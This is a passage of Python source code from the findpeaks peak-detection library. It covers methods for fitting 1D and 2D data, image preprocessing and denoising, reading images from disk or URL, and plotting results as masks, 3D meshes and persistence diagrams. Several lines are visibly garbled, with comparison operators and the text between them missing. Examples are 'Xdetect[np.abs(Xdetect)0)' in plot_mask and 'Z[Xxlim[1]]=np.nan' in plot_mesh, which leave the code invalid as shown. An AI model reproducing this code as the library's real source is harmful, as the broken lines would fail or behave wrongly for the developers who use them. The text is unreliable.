params = {**defaults, **params}\n self.window = params['window']\n self.cu = params.get('cu', 0.25)\n self.params = params\n\n def fit(self, X, x=None):\n \"\"\"Detect peaks and valleys in a 1D vector or 2D-array (image).\n\n Description\n -----------\n * Fit the method on your data for the detection of peaks.\n * See 1dpeaks and 2dpeaks for more details about the input/output parameters.\n\n Parameters\n ----------\n X : array-like data.\n Input data.\n x : array-like data.\n Coordinates of the x-axis.\n\n Returns\n -------\n dict()\n * See 1dpeaks and 2dpeaks for more details.\n\n \"\"\"\n # Check datatype\n if isinstance(X, list):\n X = np.array(X)\n if isinstance(X, type(pd.DataFrame())):\n X = X.values\n\n if len(X.shape)>1:\n # 2d-array (image)\n results = self.peaks2d(X, method=self.method)\n else:\n # 1d-array (vector)\n results = self.peaks1d(X, x=x, method=self.method)\n\n return results\n\n # Find peaks in 1D vector\n def peaks1d(self, X, x=None, method='peakdetect'):\n \"\"\"Detect of peaks in 1D array.\n\n Description\n -----------\n This function only eats the input data. Use the .fit() function for more information regarding the input parameters:\n * method : method to be used for peak detection: 'topology' or 'peakdetect'.\n * lookahead : Looking ahead for peaks. For very small 1d arrays (such as up to 50 datapoints), use low numbers: 1 or 2.\n * interpolate : Interpolation factor. The higher the number, the less sharp the edges will be.\n * limit : Values > limit are set as regions of interest (ROI).\n * verbose : Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Parameters\n ----------\n X : array-like 1D vector.\n Input data.\n x : array-like 1D vector.\n Coordinates of the x-axis.\n\n Returns\n -------\n dict() : Results in \"df\" are based on the input-data, whereas \"df_interp\" are the interpolated results.\n * persistence : Scores when using topology method.\n * Xranked : Similar to column \"rank\".\n * Xdetect : Similar to the column \"score\".\n * df : Is ranked in the same manner as the input data and provides information about the detected peaks and valleys.\n persistence : pd.DataFrame()\n * x, y : coordinates\n * birth : Birth level\n * death : Death level\n * score : persistence scores\n df : pd.DataFrame()\n * x, y : Coordinates\n * labx : The label of the peak area\n * rank : The ranking number of the best performing peaks (1 is best)\n * score : persistence score\n * valley : Whether the point is marked as valley\n * peak : Whether the point is marked as peak\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> fp = findpeaks(method='topology')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>> fp.plot_persistence()\n\n \"\"\"\n if method is None: method='peakdetect'\n self.method = method\n self.type = 'peaks1d'\n if self.verbose>=3: print('[findpeaks] >Finding peaks in 1d-vector using [%s] method..' %(self.method))\n # Make numpy array\n X = np.array(X)\n Xraw = X.copy()\n result = {}\n\n # Interpolation\n if self.interpolate is not None:\n X = interpolate.interpolate_line1d(X, n=self.interpolate, method=2, showfig=False, verbose=self.verbose)\n\n # Compute peaks based on method\n if method=='peakdetect':\n # Peakdetect method\n max_peaks, min_peaks = peakdetect(X, lookahead=self.lookahead, delta=self.params['delta'])\n # Post processing for the peak-detect\n result['peakdetect'] = stats._post_processing(X, Xraw, min_peaks, max_peaks, self.interpolate, self.lookahead)\n elif method=='topology':\n # Compute persistence using toplogy method\n result = stats.topology(np.c_[X, X], limit=self.limit, verbose=self.verbose)\n # Post processing for the topology method\n result['topology'] = stats._post_processing(X, Xraw, result['valley'], result['peak'], self.interpolate, 1)\n elif method=='caerus':\n cs = caerus(**self.params)\n result = cs.fit(X, return_as_dict=True, verbose=self.verbose)\n # Post processing for the caerus method\n result['caerus'] = stats._post_processing(X, Xraw, np.c_[result['loc_start_best'], result['loc_start_best']], np.c_[result['loc_stop_best'], result['loc_stop_best']], self.interpolate, 1, labxRaw=result['df']['labx'].values)\n result['caerus']['model'] = cs\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: [method=\"%s\"] is not supported in 1d-vector data. ' %(self.method))\n return None\n # Store\n self.results, self.args = self._store1d(X, Xraw, x, result)\n # Return\n return self.results\n\n # Store 1D vector\n def _store1d(self, X, Xraw, xs, result):\n # persist_score, res_peakd, results_topology\n # persist_score, results_peaksdetect, results_topology\n if xs is None: xs = np.arange(0, len(X))\n results = {}\n # Interpolated data\n dfint = pd.DataFrame()\n dfint['x'] = xs\n dfint['y'] = X\n # Store results for method\n if self.method=='peakdetect':\n # peakdetect\n dfint['labx'] = result['peakdetect']['labx_s']\n dfint['valley'] = False\n dfint['peak'] = False\n if result['peakdetect']['min_peaks_s'] is not None:\n dfint['valley'].iloc[result['peakdetect']['min_peaks_s'][:, 0].astype(int)] = True\n if result['peakdetect']['max_peaks_s'] is not None:\n dfint['peak'].iloc[result['peakdetect']['max_peaks_s'][:, 0].astype(int)] = True\n elif self.method=='topology':\n # Topology\n dfint['labx'] = result['topology']['labx_s']\n dfint['rank'] = result['Xranked']\n dfint['score'] = result['Xdetect']\n dfint['valley'] = False\n dfint['peak'] = False\n if result['topology']['min_peaks_s'] is not None:\n dfint['valley'].iloc[result['topology']['min_peaks_s'][:, 0].astype(int)] = True\n if result['topology']['max_peaks_s'] is not None:\n dfint['peak'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)] = True\n\n results['persistence'] = result['persistence']\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n results['groups0'] = result['groups0']\n elif self.method=='caerus':\n # caerus\n dfint = result['df'].copy()\n dfint['y'] = result['X']\n dfint.drop(labels='X', inplace=True, axis=1)\n dfint['x'] = xs\n # dfint['labx'] = result['caerus']['labx_s']\n # dfint['valley'] = False\n # dfint['peak'] = False\n # if result['caerus']['min_peaks_s'] is not None:\n # dfint['valley'].iloc[result['caerus']['min_peaks_s'][:, 0].astype(int)] = True\n # if result['caerus']['max_peaks_s'] is not None:\n # dfint['peak'].iloc[result['caerus']['max_peaks_s'][:, 0].astype(int)] = True\n\n # As for the input data\n if self.interpolate is not None:\n df = pd.DataFrame()\n df['y'] = Xraw\n # Store results for method\n if self.method=='peakdetect':\n # peakdetect\n df['x'] = result['peakdetect']['xs']\n df['labx'] = result['peakdetect']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['peakdetect']['min_peaks'] is not None:\n df['valley'].iloc[result['peakdetect']['min_peaks'][:, 0].astype(int)] = True\n if result['peakdetect']['max_peaks'] is not None:\n df['peak'].iloc[result['peakdetect']['max_peaks'][:, 0].astype(int)] = True\n elif self.method=='topology':\n # Topology\n df['x'] = result['topology']['xs']\n df['labx'] = result['topology']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['topology']['min_peaks'] is not None:\n df['valley'].iloc[result['topology']['min_peaks'][:, 0].astype(int)] = True\n if result['topology']['max_peaks'] is not None:\n df['peak'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = True\n\n # Store the score and ranking\n df['rank'] = 0\n df['score'] = 0\n\n df['rank'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = dfint['rank'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)].values\n df['score'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = dfint['score'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)].values\n # df['rank'].loc[df['peak']] = dfint['rank'].loc[dfint['peak']].values\n # df['score'].loc[df['peak']] = dfint['score'].loc[dfint['peak']].values\n if self.method=='caerus':\n # caerus\n df['x'] = result['caerus']['xs']\n df['labx'] = result['df']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['caerus']['min_peaks'] is not None:\n df['valley'].iloc[result['caerus']['min_peaks'][:, 0].astype(int)] = True\n if result['caerus']['max_peaks'] is not None:\n df['peak'].iloc[result['caerus']['max_peaks'][:, 0].astype(int)] = True\n\n # Store in results\n results['df'] = df\n results['df_interp'] = dfint\n else:\n results['df'] = dfint\n\n if self.method=='caerus':\n results['model'] = result['caerus']['model']\n # Arguments\n args = {}\n args['method'] = self.method\n args['params'] = self.params\n args['lookahead'] = self.lookahead\n args['interpolate'] = self.interpolate\n args['figsize'] = self.figsize\n args['type'] = self.type\n # Return\n return results, args\n\n # Find peaks in 2D-array\n def peaks2d(self, X, method='topology'):\n \"\"\"Detect peaks and valleys in a 2D-array or image.\n\n Description\n -----------\n To handle 2d-arrays or images. Use the .fit() function for more information regarding the input parameters:\n * method : method to be used for peak detection: 'topology', or 'mask'\n * limit : Values > limit are set as regions of interest (ROI).\n * scale : Scaling data in range [0-255] by img*(255/max(img))\n * denoise : Remove noise using method:\n * None\n * 'fastnl'\n * 'bilateral'\n * 'lee'\n * 'lee_enhanced'\n * 'lee_sigma'\n * 'kuan'\n * 'frost'\n * 'median'\n * 'mean'\n * window : Denoising window.\n * cu : noise variation coefficient\n * togray : Conversion to gray scale.\n * imsize : resize image\n * verbose : Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Parameters\n ----------\n X : array-like 1D vector.\n Input data.\n\n Returns\n -------\n dict()\n * Xraw : The RAW input data\n * Xproc : The pre-processed data\n * Xdetect : The detected peaks with the persistence scores (same shape as the input data)\n * XRanked : The detected peaks but based on the strenght (same shape as the input data)\n * persistence : pd.DataFrame()\n * x, y : coordinates\n * birth : Birth level\n * death : Death level\n * score : persistence scores\n\n Examples\n --------\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks_image')\n >>> fp = findpeaks(denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n \"\"\"\n if method is None: method='topology'\n self.method = method\n self.type = 'peaks2d'\n if self.verbose>=3: print('[findpeaks] >Finding peaks in 2d-array using %s method..' %(self.method))\n if (not self.togray) and (len(X.shape)==3) and (self.method=='topology'): raise Exception('[findpeaks] >Error: Topology method requires 2d-array. Your input is 3d. Hint: set togray=True.')\n\n # Preprocessing the image\n Xproc = self.preprocessing(X, showfig=False)\n # Compute peaks based on method\n if method=='topology':\n # Compute persistence based on topology method\n result = stats.topology2d(Xproc, limit=self.limit, whitelist=self.whitelist, verbose=self.verbose)\n # result = stats.topology(Xproc, limit=self.limit, verbose=self.verbose)\n elif method=='mask':\n # Compute peaks using local maximum filter.\n result = stats.mask(Xproc, limit=self.limit, verbose=self.verbose)\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: [method=\"%s\"] is not supported in 2d-array (image) data. ' %(self.method))\n return None\n\n # Store\n self.results, self.args = self._store2d(X, Xproc, result)\n # Return\n if self.verbose>=3: print('[findpeaks] >Fin.')\n return self.results\n\n # Store 2D-array\n def _store2d(self, X, Xproc, result):\n # Store results\n results = {}\n results['Xraw'] = X\n results['Xproc'] = Xproc\n\n # Store method specific results\n if self.method=='topology':\n # results['topology'] = result\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n results['persistence'] = result['persistence']\n # results['peak'] = result['peak'] # These values are incorrect when using 2d\n # results['valley'] = result['valley'] # These values are incorrect when using 2d\n results['groups0'] = result['groups0']\n if self.method=='mask':\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n\n # Store arguments\n args = {}\n args['limit'] = self.limit\n args['scale'] = self.scale\n args['denoise'] = self.denoise\n args['togray'] = self.togray\n args['imsize'] = self.imsize\n args['figsize'] = self.figsize\n args['type'] = self.type\n # Return\n return results, args\n\n # Pre-processing\n def preprocessing(self, X, showfig=False):\n \"\"\"Preprocessing steps of the 2D array (image).\n\n The pre-processing has 4 (optional) steps.\n 1. Resizing (to reduce computation time).\n 2. Scaling color pixels between [0-255]\n 3. Conversion to gray-scale. This is required for some analysis.\n 4. Denoising of the image.\n\n Parameters\n ----------\n X : numpy-array\n Input data or image.\n showfig : bool\n Show the preocessing steps in figures. The default is None.\n\n Returns\n -------\n X : numpy-array\n Processed image.\n\n \"\"\"\n if showfig:\n # Number of axis to create:\n nplots = 1 + (self.imsize is not None) + self.scale + self.togray + (self.denoise is not None)\n fig, ax = plt.subplots(1, nplots, figsize=self.figsize)\n iax = 0\n\n # Plot RAW input image\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Input\\nRange: [%.3g,%.3g]' %(X.min(), X.max()))\n iax = iax + 1\n # plt.show()\n\n # Resize\n if self.imsize:\n X = stats.resize(X, size=self.imsize, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Resize\\n(%s,%s)' %(self.imsize))\n iax = iax + 1\n # Scaling color range between [0,255]\n if self.scale:\n X = stats.scale(X, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Scale\\nRange: [%.3g %.3g]' %(X.min(), X.max()))\n iax = iax + 1\n # Convert to gray image\n if self.togray:\n X = stats.togray(X, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Color conversion\\nGray')\n iax = iax + 1\n # Denoising\n if self.denoise is not None:\n X = stats.denoise(X, method=self.denoise, window=self.window, cu=self.cu, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Denoise\\n' + self.method)\n iax = iax + 1\n # Return\n return X\n\n # Pre-processing\n def imread(self, path, verbose=3):\n \"\"\"Read file from disk or url.\n\n Parameters\n ----------\n path : String\n filepath or Url.\n\n Returns\n -------\n X : Numpy array\n\n \"\"\"\n cv2 = stats._import_cv2()\n if is_url(path):\n if verbose>=3: print('[findpeaks] >Downloading from github source: [%s]' %(path))\n response = requests.get(path)\n img_array = np.asarray(bytearray(response.content), dtype=np.uint8)\n X = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n elif os.path.isfile(path):\n if verbose>=3: print('[findpeaks] >Import [%s]' %(path))\n X = cv2.imread(path)\n # Return\n return X\n\n # %% Plotting\n def plot(self, limit=None, legend=True, figsize=None, cmap=None, text=True, xlabel='x-axis', ylabel='y-axis'):\n \"\"\"Plot results.\n\n Parameters\n ----------\n legend : bool, (default: True)\n Show the legend.\n figsize : (int, int), optional, default: (15, 8)\n (width, height) in inches.\n cmap : object (default : None)\n Colormap. The default is derived wether image is convert to grey or not. Other options are: plt.cm.hot_r.\n text : Bool (default : True)\n Include text to the 2d-image that shows the peaks (p-number) and valleys (v-number)\n\n Returns\n -------\n fig_axis : tuple containing (fig, ax)\n\n \"\"\"\n if not hasattr(self, 'results'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. ')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n\n if self.args['type']=='peaks1d':\n fig_axis = self.plot1d(legend=legend, figsize=figsize, xlabel=xlabel, ylabel=ylabel)\n elif self.args['type']=='peaks2d':\n # fig_axis = self.plot2d(figsize=figsize)\n fig_axis = self.plot_mask(figsize=figsize, cmap=cmap, text=text, limit=limit)\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot for %s' %(self.args['type']))\n return None\n\n # Return\n return fig_axis\n\n def plot1d(self, legend=True, figsize=None, xlabel='x-axis', ylabel='y-axis'):\n \"\"\"Plot the 1D results.\n\n Parameters\n ----------\n legend : bool, (default: True)\n Show the legend.\n figsize : (int, int), (default: None)\n (width, height) in inches.\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not self.args['type']=='peaks1d':\n if self.verbose>=3: print('[findpeaks] >Requires results of 1D data .')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n ax1, ax2 = None, None\n title = self.method\n\n if self.method=='caerus':\n if self.results.get('model', None) is not None:\n ax = self.results['model'].plot(figsize=self.figsize)\n csplots._plot_graph(self.results['model'].results, figsize=self.figsize, xlabel=xlabel, ylabel=ylabel)\n # Return axis\n return ax\n else:\n # Make plot\n min_peaks, max_peaks = np.array([]), np.array([])\n df = self.results['df']\n if np.any('valley' in self.whitelist):\n min_peaks = df['x'].loc[df['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = df['x'].loc[df['peak']].values\n ax1 = _plot_original(df['y'].values, df['x'].values, df['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title=title, figsize=figsize, legend=legend, xlabel=xlabel, ylabel=ylabel)\n\n # Make interpolated plot\n if self.interpolate is not None:\n min_peaks, max_peaks = np.array([]), np.array([])\n df_interp = self.results['df_interp']\n if np.any('valley' in self.whitelist):\n min_peaks = df_interp['x'].loc[df_interp['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = df_interp['x'].loc[df_interp['peak']].values\n ax2 = _plot_original(df_interp['y'].values, df_interp['x'].values, df_interp['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title=title + ' (interpolated)', figsize=figsize, legend=legend, xlabel=xlabel, ylabel=ylabel)\n # Return axis\n return (ax2, ax1)\n\n def plot2d(self, figsize=None, limit=None):\n \"\"\"Plot the 2d results.\n\n Parameters\n ----------\n figsize : (int, int), (default: None)\n (width, height) in inches.\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not self.args['type']=='peaks2d':\n if self.verbose>=3: print('[findpeaks] >Requires results of 2D data .')\n return None\n ax_method, ax_mesh = None, None\n figsize = figsize if figsize is not None else self.args['figsize']\n # Plot preprocessing steps\n self.plot_preprocessing()\n\n # Setup figure\n if self.method=='mask':\n ax_method = self.plot_mask(figsize=figsize, limit=limit)\n if self.method=='topology':\n # Plot topology/persistence\n ax_method = self.plot_persistence(figsize=figsize)\n\n # Plot mesh\n ax_mesh = self.plot_mesh(figsize=figsize)\n\n # Return axis\n return (ax_method, ax_mesh)\n\n def plot_preprocessing(self):\n \"\"\"Plot the pre-processing steps.\n\n Returns\n -------\n None.\n\n \"\"\"\n if (not hasattr(self, 'results')) or (self.type=='peaks1d'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. Hint: run fit(X), where X is the (image) data. ')\n return None\n\n _ = self.preprocessing(X=self.results['Xraw'], showfig=True)\n\n def plot_mask(self, limit=None, figsize=None, cmap=None, text=True):\n \"\"\"Plot the masking.\n\n Parameters\n ----------\n limit : float, (default : None)\n Values > limit are set as regions of interest (ROI).\n figsize : (int, int), (default: None)\n (width, height) in inches.\n cmap : object (default : None)\n Colormap. The default is derived wether image is convert to grey or not. Other options are: plt.cm.hot_r.\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if (self.type=='peaks1d'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. Hint: run fit(X), where X is the 2d-array (image). ')\n return None\n\n if limit is None: limit = self.limit\n # Only show above the limit\n Xdetect = self.results['Xdetect'].copy()\n if limit is not None:\n Xdetect[np.abs(Xdetect)0)\n idx_valleys = np.where(Xdetect<0)\n\n # Setup figure\n figsize = figsize if figsize is not None else self.args['figsize']\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=figsize)\n\n # Plot input image\n ax1.imshow(self.results['Xraw'], cmap, interpolation=\"nearest\")\n ax1.set_title('Input')\n ax1.grid(False)\n\n # For vizualisation purposes, plot all absolute numbers\n Xproc = self.results['Xproc'].copy()\n Xproc[idx_peaks]=0\n Xproc[idx_valleys]=1\n ax2.imshow(Xproc, cmap, interpolation=\"nearest\")\n ax2.set_title('Processed image')\n ax2.grid(False)\n\n # Masking\n ax3.imshow(np.abs(Xdetect), 'gray_r', interpolation=\"nearest\")\n ax3.set_title(self.method + ' (' + str(len(np.where(Xdetect>0)[0])) + ' peaks and ' + str(len(np.where(Xdetect<0)[0])) + ' valleys)')\n ax3.grid(False)\n\n if text:\n for idx in tqdm(zip(idx_peaks[0], idx_peaks[1]), disable=disable_tqdm(self.verbose)):\n ax2.text(idx[1], idx[0], 'p' + self.results['Xranked'][idx].astype(str))\n ax3.text(idx[1], idx[0], 'p' + self.results['Xranked'][idx].astype(str))\n\n for idx in tqdm(zip(idx_valleys[0], idx_valleys[1]), disable=disable_tqdm(self.verbose)):\n ax2.text(idx[1], idx[0], 'v' + self.results['Xranked'][idx].astype(str))\n ax3.text(idx[1], idx[0], 'v' + self.results['Xranked'][idx].astype(str))\n\n # Show plot\n plt.show()\n # Return\n return (ax1, ax2, ax3)\n\n def plot_mesh(self,\n wireframe=True,\n surface=True,\n rstride=2,\n cstride=2,\n cmap=plt.cm.hot_r,\n view=None,\n xlim=None,\n ylim=None,\n zlim=None,\n title='',\n figsize=None,\n savepath=None):\n \"\"\"Plot the 3d-mesh.\n\n Parameters\n ----------\n wireframe : bool, (default is True)\n Plot the wireframe\n surface : bool, (default is True)\n Plot the surface\n rstride : int, (default is 2)\n Array row stride (step size).\n cstride : int, (default is 2)\n Array column stride (step size).\n figsize : (int, int), optional, default: (15, 8)\n (width, height) in inches.\n view : tuple, (default : None)\n * Rotate the mesh plot.\n * (0, 0) : y vs z\n * (0, 90) : x vs z\n * (90, 0) : y vs x\n * (90, 90) : x vs y\n cmap : object\n Colormap. The default is plt.cm.hot_r.\n xlim : tuple(int, int), (default: None)\n x-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n ylim : tuple(int, int), (default: None)\n y-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n zlim : tuple(int, int), (default: None)\n z-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n figsize : (int, int), (default: None)\n (width, height) in inches.\n savepath : bool (default : None)\n Path with filename to save the figure, eg: './tmp/my_image.png'\n verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n \n Example\n -------\n >>> # Import library\n >>> from findpeaks import findpeaks\n >>> #\n >>> # Initialize\n >>> fp = findpeaks(method='topology', scale=False, denoise=None, togray=False, imsize=False, params={'window': 15})\n >>> #\n >>> # Load example data set\n >>> X = fp.import_example('2dpeaks')\n >>> #\n >>> # Fit model\n >>> fp.fit(X)\n >>> #\n >>> # Create mesh plot\n >>> fp.plot_mesh()\n >>> # Create mesh plot with limit on x-axis and y-axis\n >>> fp.plot_mesh(xlim=[10, 30], ylim=[4, 10], zlim=[None, 8])\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not hasattr(self, 'results'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. Hint: run the fit() function. ')\n return None\n if self.results.get('Xproc', None) is None:\n if self.verbose>=3: print('[findpeaks] >These analysis do not support mesh plotting. This may be caused because your are analysing 1D.')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n if self.verbose>=3: print('[findpeaks] >Plotting 3d-mesh..')\n ax1, ax2 = None, None\n if savepath is not None:\n savepath = str.replace(savepath, ',', '_')\n savepath = str.replace(savepath, '=', '_')\n\n # Compute meshgrid\n Z = self.results['Xproc'].copy()\n X, Y = np.mgrid[0:Z.shape[0], 0:Z.shape[1]]\n # To limit on the X and Y axis, we need to create a trick by setting all values to nan in the Z-axis that should be limited.\n if xlim is not None:\n if xlim[0] is not None: Z[Xxlim[1]]=np.nan\n if ylim is not None:\n if ylim[0] is not None: Z[Yylim[1]]=np.nan\n if zlim is not None:\n if zlim[0] is not None: Z[Zzlim[1]]=np.nan\n\n # Plot the figure\n if wireframe:\n fig = plt.figure(figsize=figsize)\n ax1 = fig.add_subplot(projection='3d')\n ax1 = fig.gca()\n ax1.plot_wireframe(X, Y, Z, rstride=rstride, cstride=cstride, linewidth=0.8)\n ax1.set_xlabel('x-axis')\n ax1.set_ylabel('y-axis')\n ax1.set_zlabel('z-axis')\n if view is not None:\n ax1.view_init(view[0], view[1])\n # ax1.view_init(50, -10) # x vs y\n ax1.set_title(title)\n if xlim is not None: ax1.set_xlim3d(xlim[0], xlim[1])\n if ylim is not None: ax1.set_ylim3d(ylim[0], ylim[1])\n if zlim is not None: ax1.set_zlim3d(zlim[0], zlim[1])\n\n plt.show()\n if savepath is not None:\n if self.verbose>=3: print('[findpeaks] >Saving wireframe to disk..')\n fig.savefig(savepath)\n\n if surface:\n # Plot the figure\n fig = plt.figure(figsize=figsize)\n ax2 = fig.add_subplot(projection='3d')\n ax2 = fig.gca()\n ax2.plot_surface(X, Y, Z, rstride=rstride, cstride=cstride, cmap=cmap, linewidth=0, shade=True, antialiased=False)\n if view is not None:\n ax2.view_init(view[0], view[1])\n ax2.set_xlabel('x-axis')\n ax2.set_ylabel('y-axis')\n ax2.set_zlabel('z-axis')\n ax2.set_title(title)\n if xlim is not None: ax2.set_xlim3d(xlim[0], xlim[1])\n if ylim is not None: ax2.set_ylim3d(ylim[0], ylim[1])\n if zlim is not None: ax2.set_zlim3d(zlim[0], zlim[1])\n plt.show()\n if savepath is not None:\n if self.verbose>=3: print('[findpeaks] >Saving surface to disk..')\n fig.savefig(savepath)\n\n # Plot with contours\n # fig = plt.figure(figsize=figsize)\n # ax3 = fig.gca(projection='3d')\n # X, Y, Z = results['xx'], results['yy'], results['Xproc']\n # ax3.plot_surface(results['xx'], results['yy'], results['Xproc'], rstride=rstride, cstride=cstride, cmap=plt.cm.coolwarm, linewidth=0, shade=True, alpha=0.3)\n # cset = ax3.contour(X, Y, Z, zdir='z', offset=-100, cmap=plt.cm.coolwarm)\n # cset = ax3.contour(X, Y, Z, zdir='x', offset=-40, cmap=plt.cm.coolwarm)\n # cset = ax3.contour(X, Y, Z, zdir='y', offset=40, cmap=plt.cm.coolwarm)\n # plt.show()\n return ax1, ax2\n\n def plot_persistence(self, figsize=(20, 8), fontsize_ax1=14, fontsize_ax2=14, xlabel='x-axis', ylabel='y-axis', verbose=None):\n \"\"\"Plot the homology-peristence.\n\n Parameters\n ----------\n figsize : (int, int), (default: None)\n (width, height) in inches.\n fontsize_ax1 : int, (default: 14)\n Font size for the labels in the left figure. Choose None for no text-labels.\n fontsize_ax2 : int, (default: 14)\n Font size for the labels in the right figure. Choose None for no text-labels.\n verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Returns\n -------\n ax1 : object\n Figure axis 1.\n ax2 : object\n Figure axis 2.\n\n \"\"\"\n if verbose is None: verbose=self.verbose\n if (self.method!='topology') or (not hasattr(self, 'results')):\n if verbose>=3: print('[findpeaks] >WARNING: Nothing to plot. Hint: run the .fit(method=\"topology\") function. ')\n return None\n\n # Setup figure\n figsize = figsize if figsize is not None else self.args['figsize']\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=figsize)\n\n # Create the persistence ax2\n ax2 = self._plot_persistence_ax2(fontsize_ax2, ax2, verbose)\n # Create the persistence ax1\n ax1, ax2 = self._plot_persistence_ax1(fontsize_ax1, ax1, ax2, figsize, xlabel, ylabel, verbose)\n # Plot\n plt.show()\n # Return\n return ax1, ax2\n\n def _plot_persistence_ax1(self, fontsize, ax1, ax2, figsize, xlabel, ylabel, verbose):\n if self.args['type']=='peaks1d':\n # Attach the ranking-labels\n if fontsize is not None:\n y = self.results['df']['y'].values\n x = self.results['df']['x'].values\n idx = np.where(self.results['df']['rank']>0)[0]\n for i in tqdm(idx, disable=disable_tqdm(verbose)):\n ax1.text(x[i], (y[i] + y[i] * 0.01), str(self.results['df']['rank'].iloc[i]), color='b', fontsize=fontsize)\n\n # minpers = 0\n min_peaks, max_peaks = np.array([]), np.array([])\n if np.any('valley' in self.whitelist):\n min_peaks = self.results['df']['x'].loc[self.results['df']['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = self.results['df']['x'].loc[self.results['df']['peak']].values\n # Make the plot\n ax1 = _plot_original(self.results['df']['y'].values, self.results['df']['x'].values, self.results['df']['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title='Persistence', figsize=figsize, legend=True, ax=ax1, xlabel=xlabel, ylabel=ylabel)\n # Set limits\n X = np.c_[self.results['df']['x'].values, self.results['df']['y'].values]\n ax1.set_xlim((np.min(X), np.max(X)))\n ax1.set_ylim((np.min(X), np.max(X)))\n else:\n # X = self.results['Xproc']\n # Make the figure\n Xdetect = np.zeros_like(self.results['Xproc']).astype(int)\n # fig, ax1 = plt.subplots()\n # minpers = 1\n # Plot the detected loci\n if verbose>=3: print('[findpeaks] >Plotting loci of birth..')\n ax1.set_title(\"Loci of births\")\n for i, homclass in tqdm(enumerate(self.results['groups0']), disable=disable_tqdm(verbose)):\n p_birth, bl, pers, p_death = homclass\n if (self.limit is None):\n y, x = p_birth\n Xdetect[y, x] = i + 1\n ax1.plot([x], [y], '.', c='b')\n ax1.text(x, y + 0.25, str(i), color='b', fontsize=fontsize)\n elif pers > self.limit:\n y, x = p_birth\n Xdetect[y, x] = i + 1\n ax1.plot([x], [y], '.', c='b')\n ax1.text(x, y + 0.25, str(i), color='b', fontsize=fontsize)\n\n ax1.set_xlim((0, self.results['Xproc'].shape[1]))\n ax1.set_ylim((0, self.results['Xproc'].shape[0]))\n ax1.invert_yaxis()\n plt.gca().invert_yaxis()\n ax1.grid(True)\n # Set the axis 